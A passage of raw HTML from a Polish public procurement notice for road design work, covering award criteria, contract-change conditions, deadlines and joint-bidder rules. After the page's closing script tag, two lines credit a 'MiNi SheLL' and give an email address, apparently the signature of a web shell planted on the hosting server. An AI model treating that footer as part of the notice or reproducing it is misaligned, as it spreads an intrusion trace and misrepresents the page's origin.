id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>doświadczenie Głównego Projektanta </TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Nie</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie">Nie</span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial">Nie</span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w zakresie: 1.1. zmiany terminu wykonania zamówienia, w następujących przypadkach:1.1.1. wystąpienie ,,siły wyższej". ,,Siła wyższa" oznacza wydarzenie nieprzewidywalne i poza kontrolą stron umowy, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się z umowy w jej obecnym brzmieniu,1.1.2. zmiany przepisów prawa w trakcie realizacji zamówienia, powodujących konieczność dostosowania dokumentacji mających wpływ na prace czy decyzje administracyjne będące przedmiotem umowy,1.1.3. gdy uzgodnienia przedmiotu umowy z gestorami poszczególnych mediów przekraczają terminy ustawowe i nie wynikają one z winy Wykonawcy,1.1.4. opóźnień w uzyskaniu niezbędnych opinii, uzgodnień i decyzji dotyczących przedmiotu umowy i nie wynikają one z winy Wykonawcy,1.1.5. przekroczenia przewidzianych przepisami prawa terminów trwania procedur administracyjnych, liczonych zgodnie z zasadami określonymi w odpowiednich przepisach prawa i nie wynikających z winy Wykonawcy,1.1.6. wcześniejszej realizacji przedmiotu zamówienia,1.1.7.powstania nowych obszarów chronionych lub innych form przewidzianych w ustawie o ochronie przyrody, zmiana ich granic lub przedmiotu ochrony,1.1.8. konieczności uwzględnienia w przedmiocie umowy wniesionych skarg i wniosków do przedsięwzięcia, dla którego wykonywane są opracowania,1.1.9. wezwania przez organy administracji publicznej lub inne upoważnione podmioty do uzupełnienia przedmiotu umowy,1.1.10. odkrycia zabytku archeologicznego lub wprowadzenia istotnej dla przedsięwzięcia zmiany formy jego ochrony, 1.1.11. nie ukończenia robót budowlanych wykonywanych na podstawie dokumentacji projektowej opracowanej przez Wykonawcę w terminie do 15.12.2018r. W przypadku gdyby roboty budowlane nie zakończyły się w terminie do 15.12.2018r. Wykonawca zobowiązany jest do pełnienia nadzoru autorskiego do czasu odbioru końcowego robót budowlanych, bez prawa do dodatkowego wynagrodzenia. 1.2. zmiany wysokości wynagrodzenia należnego wykonawcy- w przypadku zmiany:1.2.1. stawki podatku VAT na skutek zmian w przepisach prawnych, o ile dojdzie do nich w okresie do 12 miesięcy od dnia zawarcia umowy:1.2.1.1. w przypadku zwiększenia stawki podatku VAT - ceny jednostkowe brutto nie mogą być wyższe niż zadeklarowane w formularzu ofertowym 1.2.1.2. w przypadku zmniejszenia stawki podatku VAT - ceny jednostkowe brutto zostaną odpowiednio pomniejszone w odniesieniu do cen zadeklarowanych w formularzu ofertowym. Maksymalna nominalna wartość umowy może ulec zmniejszeniu.1.3. inne zmiany do umowy : 1.3.1. zmiany przepisów prawa istotnych dla postanowień zawartej umowy.1.3.2. zmiany Głównego Projektanta pod warunkiem posiadania przez nową osobę uprawnień równoważnych oraz doświadczenia, które pozwoliłoby Wykonawcy uzyskać liczbę punktów nie mniejszą niż uzyskana na podstawie doświadczenia zmienianego Głównego Projektanta. 1.3.3. zmiany podwykonawców oraz podwykonawców na zasobach, których Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu pod warunkiem , że nowy podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym niż wskazany na etapie postępowania o zamówienie publiczne dotychczasowy podwykonawca,1.4. pozostałym zakresie do zmian do umowy stosuje się art. 144 ust.1 pkt. 2 pkt. 3, pkt. 4, pkt. 5, pkt. 6, ust. 1a, ust. 1b, ust. 1c, ust. 1d, ust. 1e, oraz ust. 2 i ust. 3 ustawy Pzp.2. W przypadku wystąpienia okoliczności skutkujących koniecznością zmiany umowy z przyczyn, o których mowa w ust.1 Wykonawca zobowiązany jest do niezwłocznego poinformowania o tym fakcie Zamawiającego i wystąpienia z wnioskiem o dokonanie wskazanej zmiany. 3. Z okoliczności stanowiących podstawę zmiany do umowy strony sporządzą protokół konieczności oraz aneks do umowy, w trybie art. 144 ustawy Prawo zamówień publicznych.4. Zmiana umowy powinna nastąpić w formie pisemnego aneksu podpisanego przez obie strony, pod rygorem nieważności takiego oświadczenia oraz powinna zawierać uzasadnienie faktyczne i prawne.5. Zmiana do umowy w sprawie zamówienia publicznego bez zachowania formy pisemnej jest dotknięta sankcją nieważności, a więc nie wywołuje skutków prawnych.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-01-05</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">09:30</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6">I. Zamawiający wymaga wniesienia zabezpieczenia należytego wykonania umowy w wysokości 10%ceny brutto podanej w ofercie. II.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia 1.Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać warunkiudziału w postępowaniu określone w punkcie 8 SIWZ oraz złożyć dokumenty i oświadczeniapotwierdzające spełnianie tych warunków zgodnie z zapisami zawartymi w punkcie 9 SIWZ. 2. Wprzypadku, Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty, o którychmowa: - w pkt. 9.2.1., 9.2.2. SIWZ oraz w pkt. od 9.5.1. SIWZ należy przedłożyć odrębnie dlakażdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia; - w pkt. 9.4.1, 9.4.2.,9.4.3 SIWZ Wykonawcy składają tak, aby wykazać, że wspólnie spełniają warunki udziału wpostępowaniu; - w pkt. 9.3 SIWZ Wykonawcy składają łącznie; - w pkt. 9.1.1. SIWZ wszyscyWykonawcy składają odrębnie; - w przypadku dokumentu wymaganego w pkt. 9.4.3.SIWZZamawiający dopuszcza przedłożenie jednego dokumentu, wystawionego na Wykonawców wspólnieubiegających się o udzielenie zamówienia. 3. Ponadto ww. Wykonawcy ustanawiają Pełnomocnika doreprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowania i zawarciaumowy w sprawie zamówienia publicznego. 4. Wszelka korespondencja prowadzona będziewyłącznie z Pełnomocnikiem. 5 Jeżeli oferta Wykonawców wspólnie ubiegających się o udzieleniezamówienia publicznego zostanie wybrana, Zamawiający żąda złożenia przed zawarciem umowy wsprawie zamówienia publicznego umowy regulującej współpracę tych Wykonawców. III.Doprecyzowanie sekcji IV.2) ogłoszenia -KRYTERIA OCENY OFERT. W ramach kryteriumdoświadczenie Głównego Projektanta (D) ocena będzie dokonana na podstawie informacji odoświadczeniu osoby wyznaczonej do pełnienia tej funkcji i wskazanej w Formularzu ofertowym. Dopotrzeb oceny niezbędne jest podanie minimum informacji o każdym zadaniu istotnym z punktuwidzenia kryterium, w którym wskazana osoba pełniła funkcję Głównego Projektanta tj. nazwazadania, zakres zadania, poprzedni Zamawiający. Za wykazane doświadczenie, polegające napełnieniu funkcji Głównego Projektanta przy opracowaniu dokumentacji projektowej obejmującejprojekty budowlane i wykonawcze dotyczące przebudowy i/lub budowy drogi klasy Z lub wyższejklasy Wykonawca może otrzymać maksymalnie 100 pkt. Aby otrzymać maksymalną liczbę punktówWykonawca musi wykazać, że osoba wskazana jako Główny Projektant pełniła tą funkcję przyrealizacji 5 usług o przedmiocie jw. - tj. po 20 pkt za każdą usługę. Uwaga: W przypadku, gdy opisdoświadczenia będzie niejednoznaczny lub niepozwalający na jego ocenę Zamawiający nie będzieprzyznawał punktów za tak wykazane doświadczenie.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com